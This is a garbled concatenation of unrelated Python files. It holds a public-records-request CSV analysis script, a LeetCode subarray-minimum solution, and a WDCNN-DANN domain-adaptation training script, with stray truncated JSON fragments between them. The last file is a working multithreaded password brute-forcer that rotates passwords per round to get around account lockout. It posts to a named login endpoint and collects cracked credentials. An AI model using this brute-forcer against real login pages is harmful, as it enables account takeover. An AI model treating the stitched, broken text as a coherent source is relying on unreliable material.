'''harvestPRR: analyze Public Record Requests from CSV data provided by NextRequest
Created 27 Aug 20
@author: [email protected]
'''
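# Minimal usage sketch (mirrors the __main__ block at the bottom of this file;
# the file names here are placeholders, not real exports):
#	prrTbl, deptTbl = bldIndexTblCSV('requests.csv', datetime.datetime(2017, 1, 1))
#	rptOpenPRR(prrTbl, 'openPRR.csv')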
from collections import defaultdict
import csv
import datetime
import json
import random
import re
import requests
import sys
import time
import urllib.request
PRRDateFmt = '%Y-%m-%dT%H:%M:%S'
PRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'
DateTypes = {'date_received': 'recdDate',
'date_created': 'createDate',
'status_updated': 'statusUpDate'}
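# NB: of these date fields, only 'createDate' is used by the CSV pipeline below
# (see the commented-out block in anlyzCreateDates)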
def freqHist3(tbl):
'''python3 version
ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order
'''
from functools import cmp_to_key
def cmpd1(a,b):
"decreasing order of frequencies"
return b[1] - a[1]
flist = list(tbl.items()) #python3
flist.sort(key=cmp_to_key(cmpd1))
return flist
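# e.g. freqHist3({'Closed': 5, 'Open': 2}) -> [('Closed', 5), ('Open', 2)]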
AllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date',
'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons',
'Departments', 'Format Received', 'Staff Time (hrs:minutes)',
'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date',
'Staff Cost', 'Date First Contact', 'First Contact Event',
'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date',
'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company']
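# DeptNorm maps department labels that appear under older or variant names in the
# NextRequest export onto a single canonical name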
DeptNorm = {"Admin: Planning, Building & Neighborhood Preserv": "Admin: Building Inspection",
"Budget and Fiscal": "Budget and Revenue - Revenue Division",
"City Attorney Administration Unit": "City Attorney",
"City Auditor Unit": "City Auditor",
"City Clerk Unit": "City Clerk",
"Oakland Police Department": "Police Department",
"Contracts and Compliance": "Contracts Compliance",
"Transportation Services - Administration": "Department of Transportation",
"Fire": "Fire Department",
"Human Resources Management": "Human Resources",
"Information Technology (IT)": "Information Technology",
"Public Works Agency": "Public Works"}
CSVDTFormat = '%m/%d/%Y %I:%M:%S %p'  # %I (12-hour clock) so the AM/PM marker is honored
# 07/01/2020 09:54:53 AM
def bldIndexTblCSV(inf,startDate=None):
'''return prrIDTbl, deptTbl
'''
prrTbl = {}
deptTbl = defaultdict(list) # keep list of all prrIDs
statusTbl = defaultdict(int)
ncloseDate = 0
nolder = 0
nmultDept = 0
deptSepChar = b'\xef\xbf\xbd' # only used in Finance
reader = csv.DictReader(open(inf,encoding = "utf8",errors='replace'))
for i,entry in enumerate(reader):
prr = {}
prrID = entry['Id']
createDateStr = entry['Created At'].strip()
prr['createDate'] = datetime.datetime.strptime(createDateStr,CSVDTFormat) if createDateStr != '' else None
if prr['createDate'] == None or \
(startDate != None and prr['createDate'] < startDate):
nolder += 1
continue
deptStr = entry['Departments'].strip()
# NB: multiple department separated by semi-colon
if deptStr.find(';') == -1:
deptList = [deptStr]
else:
nmultDept += 1
deptList = [dept.strip() for dept in deptStr.split(';')]
deptList2 = []
for dept in deptList:
ndept = DeptNorm[dept] if dept in DeptNorm else dept
if ndept != '':
deptList2.append(ndept)
deptTbl[ndept].append(prrID)
prr['dept'] = deptList2
closeDateStr = entry['Closed Date'].strip()
prr['closeDate'] = datetime.datetime.strptime(closeDateStr,CSVDTFormat) if closeDateStr != '' else None
prr['status'] = entry['Status'].strip()
prr['text'] = entry['Request Text'].strip()
prr['closeReason'] = entry['Closure Reasons'].strip()
prr['URL'] = entry['URL'].strip()
statusTbl[ prr['status'] ] += 1
if prr['closeDate'] != None:
ncloseDate += 1
prrTbl[prrID] = prr
print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % \
(len(prrTbl),len(deptTbl),nmultDept,ncloseDate))
if startDate != None:
print('bldIndexTblCSV: NOld dropped=%d' % (nolder))
# freqList = freqHist3(deptTbl)
# print('Dept,Freq')
# for dept,freq in freqList:
# print('"%s",%d' % (dept,freq))
freqList = freqHist3(statusTbl)
print('Status,Freq')
for status,freq in freqList:
print('"%s",%d' % (status,freq))
return (prrTbl, deptTbl)
def compHistAvg(hist):
'''compute first moment
ASSUME hist: value -> freq
'''
sum = n = 0
for v in hist.keys():
n += hist[v]
sum += v * hist[v]
return n,float(sum) / n
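# e.g. compHistAvg({1: 2, 3: 1}) -> (3, 1.666...): three requests averaging ~1.67 days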
def compMedian(hist):
'''compute MEDIAN value
ASSUME hist: value -> freq
'''
	# only singletons thwart the search for the half-way point
	if len(hist) == 1:
		return list(hist.keys())[0]
sum = n = 0
vn = {}
for v in sorted(hist.keys()):
n += hist[v]
sum += v * hist[v]
vn[v] = n
half = float(n/2.)
for v in sorted(hist.keys()):
if vn[v] > half:
return v
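# e.g. compMedian({1: 2, 10: 1}) -> 1: the half-way point (1.5) falls within the two 1-day delays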
def anlyzCreateDates(prrIDTbl,outf):
'''distribution of create dates
'''
dateDist = defaultdict(int)
nmissdate = 0
for prrID,prr in prrIDTbl.items():
# 180204
# for dtype in DateTypes.values():
# if dtype in prr:
# if cdateFnd == None:
# cdateFnd = prr[dtype]
# else:
# if prr[dtype] != cdateFnd:
# cdateFnd = min([cdateFnd,prr[dtype]])
cdateFnd = prr['createDate']
if cdateFnd== None:
nmissdate += 1
continue
mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)
dateDist[mkey] += 1
print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl),nmissdate))
allMon = list(dateDist.keys())
allMon.sort()
outs = open(outf,'w')
outs.write('Month,Freq\n')
for mkey in allMon:
outs.write('%s,%d\n' % (mkey,dateDist[mkey]))
outs.close()
def normDeptName(dept):
	return re.sub(r'\W', '_', dept.upper())
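# e.g. normDeptName('Fire Department') -> 'FIRE_DEPARTMENT'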
def anlyzClearDates(prrIDTbl,deptTbl,startDate,outdir,minDeptFreq=10):
'''Compute average (over previous 90 days) number of days to respond to request
Number requests open at month start
'''
allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq ]
allDept.sort()
nonOPDresp = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq
nonOPDopen = defaultdict(int) # month -> freq
print('\n# Dept,NOld,NMissRecd,NMissClose')
missCloseDetails = defaultdict(lambda: defaultdict(list)) # dept -> recd -> [prrID]
for dept in allDept:
responseMon = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq
openReqMon = defaultdict(int) # month -> freq
nmissRecd = 0
nmissClose = 0
nolder = 0
for prrID in deptTbl[dept]:
prr = prrIDTbl[prrID]
# 180228
# recdDateTime = prr['recdDate']
recdDateTime = prr['createDate']
if recdDateTime==None:
nmissRecd += 1
continue
if recdDateTime < startDate:
nolder += 1
continue
			try:
				recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month)
			except Exception as e:
				print('anlyzClearDates: bad create date for %s: %s' % (prrID, e))
				continue
if prr['status'] == 'Closed':
# 180228
# closeDate = prr['statusUpDate']
closeDate = prr['closeDate']
if closeDate==None:
nmissClose += 1
missCloseDetails[dept][recdMonKey].append(prrID)
continue
respDelay = closeDate - recdDateTime
delayDays = respDelay.days
responseMon[recdMonKey][delayDays] += 1
# NB: was 'Oakland Police Deparment' in 180204
if dept != 'Police Department':
nonOPDresp[recdMonKey][delayDays] += 1
else:
openReqMon[recdMonKey] += 1
# NB: was 'Oakland Police Deparment' in 180204
if dept != 'Police Department':
nonOPDopen[recdMonKey] += 1
print('"%s",%d,%d,%d' % (dept,nolder,nmissRecd,nmissClose))
allMonth = list(responseMon.keys())
allMonth.sort()
normDept = normDeptName(dept)
outf = outdir + normDept + '-RT.csv'
outs = open(outf,'w')
outs.write('Month,NClose,NOpen,Avg,Median\n')
for recdMonKey in allMonth:
nreq,avgDelay = compHistAvg(responseMon[recdMonKey])
medianDelay = compMedian(responseMon[recdMonKey])
outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,openReqMon[recdMonKey],avgDelay,medianDelay))
outs.close()
# outf = outdir + normDept + '-nopen.csv'
# outs = open(outf,'w')
# outs.write('Month,NOpen\n')
# for recdMonKey in allMonth:
# outs.write('%s,%d\n' % (recdMonKey,openReqMon[recdMonKey]))
# outs.close()
allMonth = list(nonOPDresp.keys())
allMonth.sort()
outf = outdir + 'NonOPD-RT.csv'
outs = open(outf,'w')
outs.write('Month,N,NOPen,Avg,Median\n')
for recdMonKey in allMonth:
nreq,avgDelay = compHistAvg(nonOPDresp[recdMonKey])
medianDelay = compMedian(nonOPDresp[recdMonKey])
outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,nonOPDopen[recdMonKey],avgDelay,medianDelay))
outs.close()
# outf = outdir + 'NonOPD-NOpen.csv'
# outs = open(outf,'w')
# outs.write('Month,NOpen\n')
# for recdMonKey in allMonth:
# outs.write('%s,%d\n' % (recdMonKey,nonOPDopen[recdMonKey]))
# outs.close()
outf = outdir + 'missClose.csv'
outs = open(outf,'w')
# missCloseDetails: dept -> recd -> freq
allDateSet = set()
for dept in missCloseDetails.keys():
allDateSet.update(missCloseDetails[dept].keys())
allDates = sorted(list(allDateSet))
hdr = 'Dept'
for date in allDates:
hdr += ',%s' % (date,)
outs.write(hdr+'\n')
for dept in sorted(missCloseDetails.keys()):
line = dept
for date in allDates:
if date in missCloseDetails[dept]:
line += ',%d' % (len(missCloseDetails[dept][date]),)
else:
line += ', '
outs.write(line+'\n')
outs.close()
def rptDeptFreq(prrTbl, deptTbl,startDate,outf):
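	'''per-department count of PRRs created on or after startDate, written as a Dept,Freq CSV'''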
# freq = defaultdict(int)
outs = open(outf,'w')
outs.write('Dept,Freq\n')
for dept in sorted(deptTbl.keys()):
nrecent = 0
for prrIdx in deptTbl[dept]:
prr = prrTbl[prrIdx]
if prr['createDate'] >= startDate:
nrecent += 1
outs.write('%s,%d\n' % (dept,nrecent))
outs.close()
def rptOpenPRR(prrTbl,outf):
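	'''bucket still-open PRRs (Open / Overdue / Due soon) by days open, split OPD vs non-OPD'''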
	daysOpen = defaultdict(lambda: defaultdict(list)) # OPD/non -> dkey -> [prrID]
runDate = datetime.datetime.today()
for prrID in prrTbl.keys():
prr = prrTbl[prrID]
opdP = 'Police Department' in prr['dept']
if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr['status'] == 'Due soon':
recdDateTime = prr['createDate']
openPeriod = runDate - recdDateTime
openDays = openPeriod.days
# NB: capture integer dividend
openYears = openDays // 365
if openYears == 0:
dkey = openDays
else:
dkey = 1000 + openYears
daysOpen[opdP][dkey].append(prrID)
outs = open(outf,'w')
outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n')
	allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[1].keys()))
allNDay = sorted(list(allNDaySet))
	for nday in allNDay:
		# dkey encoding from above: < 365 means days open; 1000+y means y whole years open
		if nday >= 1000:
			lbl = '> %d year' % (nday-1000)
		else:
			lbl = '%d' % nday
opdList = daysOpen[1][nday] if nday in daysOpen[1] else []
nonList = daysOpen[0][nday] if nday in daysOpen[0] else []
outs.write('%s,%d,%d,"%s","%s"\n' % (lbl,len(opdList),len(nonList), opdList,nonList))
outs.close()
def getWebPages(prrTbl,outf):
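	'''fetch each PRR's NextRequest page and count pages mentioning "pdf"; per-row output is currently disabled'''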
outs = open(outf,'w')
outs.write('PRRID,OPD,Text\n')
nempty = 0
npdf = 0
for i,prrID in enumerate(sorted(prrTbl.keys())):
prr = prrTbl[prrID]
if prr['URL'] == '':
nempty += 1
continue
opdP = 'Police Department' in prr['dept']
url = prr['URL']
response = urllib.request.urlopen(url)
webContentBytes = response.read()
webContent = webContentBytes.decode("utf-8")
		if webContent.find('pdf') != -1:
			# page references a PDF attachment
			npdf += 1
else:
continue
if i % 100 == 0:
print(i,npdf,nempty)
# outs.write('%s,%d,"%s"\n' % (prrID,opdP,prr['text']))
outs.close()
print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl),nempty))
def loadPRRQuery(inf):
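	'''read a CSV with a PRRId column and return the list of PRR IDs'''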
reader = csv.DictReader(open(inf))
prrIDList = []
for i,entry in enumerate(reader):
# Exhibit,PRRId
prrIDList.append(entry['PRRId'].strip())
return prrIDList
def rptQry(qryList,outf):
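	'''report create date, days open, and status for each PRR ID in qryList
	NB: reads the module-level prr20Recent table built in __main__
	'''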
outs = open(outf,'w')
outs.write('PRID,CreateDate,DaysOpen,Status\n')
runDate = datetime.datetime.today()
for prrID in qryList:
prr = prr20Recent[prrID]
recdDateTime = prr['createDate']
openPeriod = runDate - recdDateTime
openDays = openPeriod.days
outs.write('%s,%s,%d,%s\n' % (prrID,prr['createDate'].date(),openDays,prr['status']))
outs.close()
if __name__ == '__main__':
dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'
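	# NB: dataDir and the CSV file name below are specific to the author's machine; adjust for your environment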
startDate = datetime.datetime(2017,1,1)
csvFile = dataDir + 'requests-2020-07-01-sdoran.csv'
# prr20, deptTbl = bldIndexTblCSV(csvFile)
prr20Recent, deptTbl = bldIndexTblCSV(csvFile,startDate)
openPRRFile = dataDir + 'openPRR_200831.csv'
rptOpenPRR(prr20Recent,openPRRFile)
deptFreqFile = dataDir + 'deptFreq2.csv'
rptDeptFreq(prr20Recent, deptTbl,startDate,deptFreqFile)
createDateFile = dataDir + 'createDate_200831.csv'
anlyzCreateDates(prr20Recent,createDateFile)
clearDateDir = dataDir + 'deptClear_200831/'
anlyzClearDates(prr20Recent,deptTbl,startDate,clearDateDir)
openOPDFile = dataDir + 'openOPD_200831.csv'
rptOpenPRR(prr20Recent,openOPDFile)
"step-ids": [
10,
11,
13,
14,
16
]
}
|
[
10,
11,
13,
14,
16
] |
from typing import List
class Solution:
    def sumSubarrayMins(self, A: List[int]) -> int:
        # Monotonic-stack solution: for each index i find the nearest element
        # strictly smaller to the left and the nearest element smaller-or-equal
        # to the right, so each subarray's minimum is counted exactly once.
        stack = []
        prev = [None] * len(A)  # prev[i]: index of the previous element < A[i], else -1
        for i in range(len(A)):
            while stack and A[stack[-1]] >= A[i]:
                stack.pop()
            prev[i] = stack[-1] if stack else -1
            stack.append(i)
        stack = []
        nex = [None] * len(A)  # nex[i]: index of the next element <= A[i], else len(A)
        for i in range(len(A) - 1, -1, -1):
            while stack and A[stack[-1]] > A[i]:
                stack.pop()
            nex[i] = stack[-1] if stack else len(A)
            stack.append(i)
        # A[i] is the minimum of exactly (i - prev[i]) * (nex[i] - i) subarrays.
        return sum((i - prev[i]) * (nex[i] - i) * A[i]
                   for i in range(len(A))) % (10 ** 9 + 7)
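# Hedged usage sketch (not in the original file): for A = [3, 1, 2, 4] the
# subarray minimums sum to 3+1+1+1+1+1+1+2+2+4 = 17.
if __name__ == '__main__':
    assert Solution().sumSubarrayMins([3, 1, 2, 4]) == 17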
# -*- coding: utf-8 -*-
# @Time : 2022-03-09 21:51
# @Author : 袁肖瀚
# @FileName: WDCNN-DANN.py
# @Software: PyCharm
import torch
import numpy as np
import torch.nn as nn
import argparse
from model import WDCNN1
from torch.nn.init import xavier_uniform_
import torch.utils.data as Data
import matplotlib.pylab as plt
import wandb
import os
from matplotlib.ticker import FuncFormatter
# define the wandb hyperparameter defaults
hyperparameter_defaults = dict(
epochs=70,
batch_train=40,
batch_val=50,
batch_test=40,
lr=0.0002,
weight_decay=0.0005,
r=0.02
)
wandb.init(config=hyperparameter_defaults, project="WDCNN-DANN")
config = wandb.config
plt.rcParams['font.family'] = ['Times New Roman']
def to_percent(temp, position):
return '%1.0f' % (temp) + '%'
# model initialization (Xavier-uniform weights for Conv and Linear layers)
def weight_init(m):
    class_name = m.__class__.__name__  # name of the layer's class
    if class_name.find('Conv') != -1:  # find() returns -1 when the substring is absent
xavier_uniform_(m.weight.data)
if class_name.find('Linear') != -1:
xavier_uniform_(m.weight.data)
def batch_norm_init(m):
class_name = m.__class__.__name__
if class_name.find('BatchNorm') != -1:
m.reset_running_stats()
# split each class into training and validation subsets (80/20)
def data_split_train(data_set, label_set):
data_set_train = []
data_set_val = []
label_set_train = []
label_set_val = []
    for i in range(data_set.shape[0]):  # number of rows; shape[2] is the channel dimension
        index = np.arange(data_set.shape[1])  # column indices [0, 1, 2, ...]
        np.random.shuffle(index)  # shuffle in place so every call (e.g. each epoch) gets a fresh random split
a = index[:int((data_set.shape[1]) * 0.8)]
        data = data_set[i]  # the i-th row
data_train = data[a]
data_val = np.delete(data, a, 0)
data_set_train.append(data_train)
data_set_val.append(data_val)
label_set_train.extend(label_set[i][:len(data_train)])
label_set_val.extend(label_set[i][:len(data_val)])
data_set_train = np.array(data_set_train).reshape(-1, data_set.shape[-1])
data_set_val = np.array(data_set_val).reshape(-1, data_set.shape[-1])
label_set_train = np.array(label_set_train)
label_set_val = np.array(label_set_val)
return data_set_train, data_set_val, label_set_train, label_set_val
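# Hedged shape note (assumed, not stated in the original file): with a
# data_set of shape (num_classes, num_samples, 1024), data_split_train keeps
# ~80% of each class's samples for training, e.g. (10, 100, 1024) becomes a
# (800, 1024) training set and a (200, 1024) validation set.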
# training process
def train(train_dataset, val_dataset_s, val_dataset_t,train_dataset_t):
global alpha
#torch.cuda.empty_cache()
length = len(train_dataset.tensors[0])
optimizer = torch.optim.Adam(model.parameters(), lr=config.lr, weight_decay=config.weight_decay)
train_dataloader = Data.DataLoader(train_dataset, batch_size=config.batch_train, shuffle=True)
val_dataloader_s = Data.DataLoader(val_dataset_s, batch_size=config.batch_val, shuffle=False)
val_dataloader_t = Data.DataLoader(val_dataset_t, batch_size=config.batch_val, shuffle=False)
    t_loader = Data.DataLoader(train_dataset_t, batch_size=int(config.batch_train), shuffle=True)  # same batch size so both training sets run the same number of iterations
    # t_loader_iter = iter(t_loader)
val_loss_s = []
val_loss_t = []
val_acc_s = []
val_acc_t = []
    cross_loss = []  # purpose unclear for now
Source_Train_Acc=[]
for epoch in range(config.epochs):
        # t_loader = Data.DataLoader(train_dataset_t, batch_size=int(args.batch_train), shuffle=True)  # same batch size keeps the two training sets in step
t_loader_iter = iter(t_loader)
model.train()
for index, (s_data_train, s_label_train) in enumerate(train_dataloader):
p = float(index) / 20
alpha = 2. / (1. + np.exp(-10 * p)) - 1
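            # alpha follows the DANN gradient-reversal schedule 2/(1+exp(-10p)) - 1,
            # ramping the adversarial signal from 0 toward 1 as p grows.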
            t_data_train = next(t_loader_iter)  # Python 3: call next() on the iterator
s_data_train = s_data_train.float().to(device).unsqueeze(dim=1)
t_data_train = t_data_train[0].float().to(device).unsqueeze(dim=1)
s_label_train = s_label_train.long().to(device)
s_domain_label = torch.zeros(config.batch_train).long().cuda()
t_domain_label = torch.ones(config.batch_train).long().cuda()
s_out_train, s_domain_out = model(s_data_train, alpha)
t_out_train, t_domain_out = model(t_data_train, alpha)
            loss_domain_s = criterion(s_domain_out, s_domain_label)  # source-domain domain-classification loss
            loss_domain_t = criterion(t_domain_out, t_domain_label)  # target-domain domain-classification loss
            loss_c = criterion(s_out_train, s_label_train)  # label-classifier loss
loss = loss_c + (loss_domain_s + loss_domain_t)*0.02
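            # NB: the domain-loss weight 0.02 is hard-coded here even though
            # config.r (also 0.02) is defined in hyperparameter_defaults.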
optimizer.zero_grad()
loss.backward()
optimizer.step()
            pred_s = torch.argmax(s_out_train.data, 1)  # index of the maximum along dim=1
            correct_s = pred_s.eq(s_label_train).cpu().sum()  # correct source-domain predictions
acc = 100. * correct_s.item() / len(s_data_train)
Source_Train_Acc.append(acc)
wandb.log({"Source Train Acc": acc})
if index % 2 == 0:
print('Train Epoch: {}/{} [{}/{} ({:.0f}%)] \t Loss_c: {:.6f} Loss_d: {:.6f} Source Train Acc: {:.2f}%'.format
(epoch, config.epochs, (index + 1) * len(s_data_train), length,
100. * (config.batch_train * (index + 1) / length), loss_c.item(),
loss_domain_s.item() + loss_domain_t.item()
, acc))
        # validation
        model.eval()
        # source-domain validation
correct_val_s = 0
sum_loss_s = 0
length_val_s = len(val_dataset_s)
for index, (s_data_val, s_label_val) in enumerate(val_dataloader_s):
with torch.no_grad():
s_data_val = s_data_val.float().to(device).unsqueeze(dim=1)
s_label_val = s_label_val.long().to(device)
output_val_s, _ = model(s_data_val, alpha)
loss_s = criterion(output_val_s, s_label_val)
pred_val_s = torch.argmax(output_val_s.data, 1)
correct_val_s += pred_val_s.eq(s_label_val).cpu().sum()
sum_loss_s += loss_s
        acc_s = 100. * correct_val_s.item() / length_val_s  # source-domain accuracy
        average_loss_s = sum_loss_s.item() / length_val_s  # source-domain loss
        # target-domain validation
correct_val_t = 0
sum_loss_t = 0
length_val_t = len(val_dataset_t)
for index, (t_data_val, t_label_val) in enumerate(val_dataloader_t):
with torch.no_grad():
t_data_val = t_data_val.float().to(device).unsqueeze(dim=1)
t_label_val = t_label_val.long().to(device)
output_val_t, _ = model(t_data_val, alpha)
loss_t = criterion(output_val_t, t_label_val)
pred_val_t = torch.argmax(output_val_t.data, 1)
correct_val_t += pred_val_t.eq(t_label_val).cpu().sum()
sum_loss_t += loss_t
        acc_t = 100. * correct_val_t.item() / length_val_t  # target-domain accuracy
        average_loss_t = sum_loss_t.item() / length_val_t  # target-domain loss
metrics = {"Acc_val_t": acc_t, 'epoch':epoch}
wandb.log(metrics)
print('\n The {}/{} epoch result : Average loss_s: {:.6f}, Acc_val_s: {:.2f}% , Average loss_t: {:.6f}, Acc_val_t: {:.2f}%'.format(
epoch, config.epochs, average_loss_s, acc_s,average_loss_t, acc_t))
val_loss_s.append(loss_s.item())
val_loss_t.append(loss_t.item())
val_acc_t.append(acc_t)
val_acc_s.append(acc_s)
torch.save(model.state_dict(), os.path.join(wandb.run.dir, "model.pth"))
    # plot the validation accuracy curves
plt.plot(val_acc_s, 'r-',marker='s')
plt.plot(val_acc_t, 'g-',marker='*')
plt.legend(["Source domain validation accuracy", "Target domain validation accuracy"])
plt.xlabel('Epochs')
plt.ylabel('validation accuracy')
    plt.title('Source domain & Target domain Validation Accuracy Rate')
    plt.gca().yaxis.set_major_formatter(FuncFormatter(to_percent))
    plt.savefig("Source domain & Target domain Validation Accuracy Rate.png")
plt.show()
    # plot the validation losses
plt.plot(val_loss_s, 'r-',marker='o')
plt.plot(val_loss_t, 'g-',marker='x')
plt.legend(["Source domain validation Loss", "Target domain validation Loss"])
plt.xlabel('Epochs')
plt.ylabel('val_loss')
plt.title('Source domain & Target domain Validation Loss')
plt.savefig("Source domain & Target domain Validation Loss")
plt.show()
# testing
def test(test_dataset):
model.eval()
length = len(test_dataset)
correct = 0
test_loader = Data.DataLoader(test_dataset, batch_size=config.batch_test, shuffle=False)
y_test = []
y_pred = []
for index, (data, label) in enumerate(test_loader):
with torch.no_grad():
data = data.float().to(device)
label = label.long().to(device)
y_test.append(label)
output, _ = model(data.unsqueeze(dim=1), alpha)
pred = torch.argmax(output.data, 1)
y_pred.append(pred)
correct += pred.eq(label).cpu().sum()
acc = 100. * correct / length
return acc
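# NB: y_test and y_pred are collected inside test() but never used beyond it;
# only the accuracy is returned.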
if __name__ == '__main__':
torch.cuda.empty_cache()
# use cpu or gpu
if torch.cuda.is_available():
device = 'cuda'
else:
device = 'cpu'
device = torch.device(device)
# CWRU
dataset_s_train = np.load(r'bearing numpy data\dataset_train_0HP_100.npz')
dataset_s_test = np.load(r'bearing numpy data\dataset_val_0HP_80.npz')
dataset_t_train = np.load(r'bearing numpy data\dataset_train_3HP_100.npz')
dataset_t_test = np.load(r'bearing numpy data\dataset_val_3HP_80.npz')
data_s_train_val = dataset_s_train['data']
data_s_test = dataset_s_test['data'].reshape(-1, 1024)
data_t_train_val = dataset_t_train['data']
data_t_test = dataset_t_test['data'].reshape(-1, 1024)
label_s_train_val = dataset_s_train['label']
label_s_test = dataset_s_test['label'].reshape(1, -1)
label_t_train_val = dataset_t_train['label']
label_t_test = dataset_t_test['label'].reshape(1, -1)
iteration_acc = []
test_acc_s = []
# repeat several times for an average result
for iteration in range(1):
# load model
model = WDCNN1(C_in=1, class_num=10).to(device)
model.apply(weight_init)
model.apply(batch_norm_init)
# train/val
data_s_train, data_s_val, label_s_train, label_s_val = data_split_train(data_s_train_val, label_s_train_val)
data_t_train, data_t_val, _, label_t_val = data_split_train(data_t_train_val, label_t_train_val)
# transfer ndarray to tensor
data_s_train = torch.from_numpy(data_s_train)
data_s_val = torch.from_numpy(data_s_val)
        data_t_val = torch.from_numpy(data_t_val)  # added for target-domain validation
data_s_test = torch.from_numpy(data_s_test)
data_t_train = torch.from_numpy(data_t_train)
data_t_test = torch.from_numpy(data_t_test)
label_s_train = torch.from_numpy(label_s_train)
label_s_val = torch.from_numpy(label_s_val)
        label_t_val = torch.from_numpy(label_t_val)  # added for target-domain validation
label_s_test = torch.from_numpy(label_s_test)
#label_t_train = torch.from_numpy(label_t_train)
label_t_test = torch.from_numpy(label_t_test)
        # wrap the tensors into TensorDatasets
train_dataset_s = Data.TensorDataset(data_s_train, label_s_train)
train_dataset_t = Data.TensorDataset(data_t_train)
val_dataset_s = Data.TensorDataset(data_s_val, label_s_val)
        val_dataset_t = Data.TensorDataset(data_t_val, label_t_val)  # added for target-domain validation
test_dataset_s = Data.TensorDataset(data_s_test, label_s_test.squeeze())
test_dataset_t = Data.TensorDataset(data_t_test, label_t_test.squeeze())
# print(train_dataset_s, val_dataset_s)
criterion = nn.NLLLoss()
train(train_dataset_s, val_dataset_s, val_dataset_t,train_dataset_t)
s_test_acc = test(test_dataset_s)
t_test_acc = test(test_dataset_t)
print('\n source_acc: {:.2f}% target_acc: {:.2f}%'.format(s_test_acc, t_test_acc))
wandb.finish()
import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep
MAX_ROUND = 3  # number of brute-force rounds
curr_round = 0  # current round
sleep_time = 2  # seconds to sleep after each round
def login_limit_user():
"""
    Login worker: try one (username, password) pair from the dictionary queue.
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print("[Error] {0}".format(repr(e)))
return
username = login_info[0]
    # skip this username if its password has already been cracked
if username in success_username:
return
password = login_info[1]
    # log in
payload = {
"username": username,
"password": password,
}
    print('Trying username: {}, password: {}'.format(username, password))
# url = "http://127.0.0.1:8000/user/login-block-account/?referer=/"
url = "http://ss.gentlecp.com:40000/user/login-block-account/?referer=/"
r = requests.post(url, data=payload)
    # check whether the login succeeded
if r.status_code == 200:
msg = login_info
success_str = "欢迎访问GentleCP的网站"
if success_str in r.text:
            # on success, save the login info to success_queue
success_queue.put(msg)
            # record the cracked username in success_username so later attempts on it are skipped
success_username.append(username)
print("[INFO] success: ", msg)
            # call stop_brute() here to stop as soon as one password is cracked; otherwise leave it commented out
# stop_brute()
def get_dict(dict_user, dict_pass):
"""
    Build the (username, password) dictionary queue.
:return:
"""
with open("dict/{}".format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
        # switch to the next password every round
p = passwords[curr_round % len(passwords)]
count += 1
pair = (u, p)
dict_queue.put(pair)
print("字典生成完成,长度 {}".format(count))
def get_parse() -> dict:
parser = argparse.ArgumentParser()
parser.add_argument("--username", "-u", help="用户名字典")
parser.add_argument("--password", "-p", help="密码字典")
dic = vars(parser.parse_args())
return dic
def print_result():
"""
    Print the brute-force results.
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print("\n[INFO] 爆破结果: ", success)
if __name__ == "__main__":
args = get_parse()
    # argparse stores the options under 'username'/'password'; fall back to the default dictionaries
    dict_username = args.get('username') or "username.txt"
    dict_password = args.get('password') or "password.txt"
for curr_round in range(0, MAX_ROUND):
print("[INFO] 开始第{0}轮爆破".format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print("[INFO] Sleep.")
        sleep(sleep_time)
print_result()
"step-4": "import argparse\nimport requests\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\nfrom random import choice\nfrom time import sleep\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n 